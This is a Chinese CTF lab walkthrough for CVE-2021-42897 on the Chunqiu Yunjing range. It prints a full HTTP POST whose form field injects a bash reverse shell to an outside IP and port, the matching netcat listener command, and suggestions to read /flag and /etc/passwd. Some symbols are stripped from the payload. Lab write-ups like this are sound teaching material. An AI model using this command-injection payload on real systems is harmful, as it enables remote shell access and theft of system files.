春秋云境CVE-2021-42897(保姆级教学) 1.阅读靶场介绍这里我们可以得到的有用信息就是存在任意代码执行漏洞这里博主提前剧透一下博主是post一个报文然后反弹shell去cat /flag带着思路我们直接进入靶场2.启动靶场我们会得到如下页面这个页面博主试过弱密码/空口令/爆破等等最后发现没有成功于是直接bp抓包然后发送报文这里各位要去修改host和请求体的内容ip/port这两个参数POST /system/datarec.php HTTP/2 Host: eci-2ze7xarqd63euoeunmxj.cloudeci1.ichunqiu.com:80 Content-Length: 75 Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 Origin: http://eci-2ze3es0hytbdktzuz9xu.cloudeci1.ichunqiu.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9 Referer: http://eci-2ze3es0hytbdktzuz9xu.cloudeci1.ichunqiu.com/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9,zh-TW;q0.8 Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d959431666320065,1666528495,1666591607; Hm_lpvt_2d0601bd28de7d49818249cf35d959431666604245 r_name$(bash-cbash-i%26/dev/tcp/152.136.201.53/77770%2612%261)我们要开启nc -lvvp 7777先然后就发送报文就会收到反弹shell了接着就是去cat /flag一般来说我们都是去读取cat /etc/passwd读取一些密码信息的敏感文件就可以去复现这个漏洞了到此文章又接近尾声了感谢你们宝贵的时间